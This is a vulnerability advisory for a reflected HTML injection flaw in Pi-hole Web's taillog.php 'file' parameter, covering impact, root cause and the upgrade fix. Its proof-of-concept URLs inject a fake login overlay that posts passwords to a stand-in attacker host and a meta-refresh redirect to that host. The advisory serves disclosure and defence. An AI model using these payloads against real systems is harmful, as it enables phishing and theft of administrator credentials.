Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-33403 |
| Advisory | GHSA-7xqw-r9pr-qv59 |
| Vulnerability Type | Reflected DOM-based XSS / HTML Injection |
| Attack Vector | Network |
| CVSS v3.1 Base Score | 6.1 (Medium) |
| CVSS v3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| Affected Versions | Pi-hole Web v6.0 through v6.4.1 |
| Patched Version | v6.5 |
| Discovered By | Mohammed Alzahrani, andrejtomci, n1rwhex |
Description
Pi-hole Web versions 6.0 through 6.4.1 contain a reflected XSS / HTML injection vulnerability in scripts/js/taillog.js. The file query parameter is used in an error message that is inserted directly into the DOM via innerHTML without sanitization or escaping.
Vulnerable code location: scripts/js/taillog.js, lines 99–101
Although the application’s Content-Security-Policy blocks inline JavaScript execution, the CSP is missing a form-action directive and includes style-src 'unsafe-inline'. This allows an attacker to inject fully styled HTML forms — enabling credential harvesting even without script execution.
Impact
An attacker who tricks a logged-in Pi-hole administrator into clicking a crafted link can:
- Harvest credentials via injected phishing forms that POST to an attacker-controlled server
- Redirect victims to arbitrary external domains via injected
<meta>refresh tags - Inject arbitrary HTML into the admin interface with full styling control
Proof of Concept
1. HTML Injection
Inject arbitrary styled HTML via the file parameter:
http://<PIHOLE_IP>/admin/taillog.php?file=<h1+style="color:red">INJECTED</h1>
2. Credential Phishing (Session Expired Overlay)
Inject a full-viewport fake “Session Expired” form that exfiltrates credentials:
http://<PIHOLE_IP>/admin/taillog.php?file=<div+style="position:fixed;top:0;left:0;width:100%;height:100%;background:#fff;z-index:9999"><h2>Session+Expired</h2><form+action="https://attacker.com/collect"+method="POST"><input+name="password"+type="password"+placeholder="Re-enter+password"><button>Login</button></form></div>
3. Open Redirect
http://<PIHOLE_IP>/admin/taillog.php?file=<meta+http-equiv="refresh"+content="0;url=https://attacker.com">
Root Cause
Two contributing factors make this exploitable beyond basic HTML injection:
- Missing
form-actionCSP directive — forms can POST to any external origin style-src 'unsafe-inline'— injected elements can be styled to convincingly overlay the legitimate UI
Remediation
Update Pi-hole Web to version 6.5 or later.
pihole -up
The fix applies HTML escaping to error messages rendered in taillog.js and tightens the CSP policy.
References
Discovered and reported by Mohammed Alzahrani, andrejtomci, and n1rwhex.